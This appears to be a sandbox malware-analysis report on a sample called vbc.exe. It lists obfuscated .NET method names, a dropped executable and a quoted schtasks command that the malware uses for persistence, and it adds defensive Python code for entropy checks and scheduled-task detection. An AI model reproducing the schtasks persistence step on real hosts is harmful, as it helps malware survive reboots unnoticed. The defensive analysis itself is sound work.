Source: 8.0.vbc.exe.d10000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.9.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.9.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.9.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.9.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.9.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.9.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.9.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.3.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.3.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.3.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.3.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.3.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.3.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.3.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.2.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.2.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.2.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.2.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.2.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.2.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.2.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
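Two of the static findings above rest on the same measurement. A `.text` section at 7.92 bits per byte (the ceiling is 8.0) is close to uniformly random, which compiled code never is; that is what a packed or encrypted payload looks like, and it is consistent with the unpacker and process-hollowing behaviour elsewhere in this report. The "High entropy of concatenated method names" entries apply the same idea to text: a .NET class whose methods are called `dsPTSCO1H`, `oWOSSrv9j` and so on has been run through a name obfuscator, while untouched classes keep names like `Dispose` and `DataRead`. The block below is an added example for this page, not Joe Sandbox code: it walks the PE section table by hand so it needs no third-party module, scores method names the same way, and runs on a constructed two-section image and on the names copied from the first finding. The 5.0 threshold is an assumption for the example; the report does not publish the cut-off its rule uses.

```python
"""Shannon-entropy checks behind two static findings in this report: a .text
section at ~7.92 bits/byte and .NET classes whose concatenated method names
look random."""
import math
import random
import struct
from collections import Counter


def shannon_entropy(data) -> float:
    """Bits per symbol; 8.0 is the ceiling for bytes, log2(alphabet) for text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_section_entropies(pe: bytes) -> dict:
    """Walk the PE section table by hand (no pefile needed) and return
    {section name: entropy of its raw data}."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]   # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]    # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                             # first IMAGE_SECTION_HEADER
    result = {}
    for k in range(n_sections):
        hdr = table + 40 * k
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        result[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return result


def build_sample_pe() -> bytes:
    """Constructed two-section image for offline use; it is not the analysed
    sample. .text gets PRNG bytes (what a packed/encrypted payload looks
    like), .rsrc gets zeros."""
    rng = random.Random(1)
    text = bytes(rng.getrandbits(8) for _ in range(8192))
    rsrc = b"\0" * 1024
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)   # i386, 2 sections, no optional header

    def section(name, ptr, size):
        return name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", size, 0x1000, size, ptr, 0, 0, 0, 0, 0x60000020)

    headers = (bytes(dos) + b"PE\0\0" + coff
               + section(b".text", 0x200, len(text))
               + section(b".rsrc", 0x200 + len(text), len(rsrc)))
    return headers.ljust(0x200, b"\0") + text + rsrc


# Assumed cut-off for this example; the report does not publish the value
# its "High entropy of concatenated method names" rule uses.
NAME_ENTROPY_THRESHOLD = 5.0


def method_name_entropy(names) -> float:
    """Entropy over the concatenation of one class's method names, the way
    the report scores a class at a time."""
    return shannon_entropy("".join(names))


def names_look_obfuscated(names) -> bool:
    return method_name_entropy(names) >= NAME_ENTROPY_THRESHOLD


# Method names copied from the report's first finding, and a constructed
# set of ordinary .NET names for comparison.
REPORT_NAMES = ['.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl',
                'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881']
ORDINARY_NAMES = ['.ctor', 'Dispose', 'DataRead', 'GetHashCode', 'ToString', 'Equals']

if __name__ == "__main__":
    for name, h in pe_section_entropies(build_sample_pe()).items():
        print(f"{name:<8} entropy {h:.4f}  {'packed?' if h > 7.0 else ''}")
    print(f"report names   {method_name_entropy(REPORT_NAMES):.3f}")
    print(f"ordinary names {method_name_entropy(ORDINARY_NAMES):.3f}")
```

On a real file, `pe_section_entropies(open(path, "rb").read())` is enough; the constructed image only exists so the example runs offline. Note that a few ordinary names (`Dispose`, `DataRead`) survive in the obfuscated classes above because they implement interface members the obfuscator must leave alone, which is why scoring the whole concatenation is more robust than looking at any single name.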

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp"
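The schtasks command line above registers a task from an XML file in the user's Temp directory, and the task name matches the file dropped under AppData\Roaming in the previous section; the temporary XML is normally gone by the time a responder looks, but the registered copy remains as an XML file under C:\Windows\System32\Tasks\Updates\ on the host. The check below is an added example for this page, not part of the report or of Joe Sandbox, that parses a task definition and flags the three tells visible here: a task folder outside Microsoft\, an action that runs from a user-writable path, and a task name that mirrors the action binary. The task XML is constructed for the example, since the report does not show the contents of tmpAA68.tmp, and it assumes the task launches the dropped uZlkYhlkeLeaKC.exe; the "user-writable" pattern is likewise an assumption to adapt per environment.

```python
"""Flag Task Scheduler registrations of the kind schtasks /Create /XML
produced here: a task outside the Microsoft\\ folder whose action runs a
binary from a user-writable directory."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed definition of "user-writable" for this example; extend per environment.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)


def task_actions(xml_data):
    """Return [(command, arguments)] for every <Exec> action in a task
    definition. Accepts bytes read straight from a file under
    C:\\Windows\\System32\\Tasks (UTF-16 with BOM) or an already-decoded str."""
    root = ET.fromstring(xml_data)
    actions = []
    for exe in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = exe.findtext("t:Command", default="", namespaces=TASK_NS).strip().strip('"')
        args = exe.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append((cmd, args))
    return actions


def suspicious_task(task_name: str, xml_data) -> list:
    """Return the reasons a task looks like malware persistence ([] if none)."""
    reasons = []
    folder, _, leaf = task_name.strip("\\").rpartition("\\")
    if not folder.lower().startswith("microsoft"):
        reasons.append(f"task registered outside Microsoft\\ folder: {folder or '(root)'}")
    for cmd, _args in task_actions(xml_data):
        if USER_WRITABLE.search(cmd):
            reasons.append(f"action runs from user-writable path: {cmd}")
        stem = cmd.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        if stem and stem.lower() == leaf.lower():
            reasons.append(f"task name mirrors the action binary: {leaf}")
    return reasons


# Constructed task definitions (not the tmpAA68.tmp from the report, whose
# contents are not shown). The first assumes the task launches the dropped
# file from the "Drops PE files" finding; the second is an ordinary Windows
# maintenance task for comparison.
DROPPER_TASK = ("Updates\\uZlkYhlkeLeaKC", """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>"C:\\Users\\user\\AppData\\Roaming\\uZlkYhlkeLeaKC.exe"</Command></Exec>
  </Actions>
</Task>""")
BENIGN_TASK = ("Microsoft\\Windows\\Defrag\\ScheduledDefrag", """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="LocalSystem">
    <Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec>
  </Actions>
</Task>""")

if __name__ == "__main__":
    for name, xml in (DROPPER_TASK, BENIGN_TASK):
        print(name, suspicious_task(name, xml) or "ok")
```

On a live host, walk C:\Windows\System32\Tasks recursively, derive `task_name` from the path relative to that directory, and feed each file's bytes to `suspicious_task`; the `/XML` route leaves the same on-disk record as any other registration, so this also catches tasks whose source XML was deleted.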

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
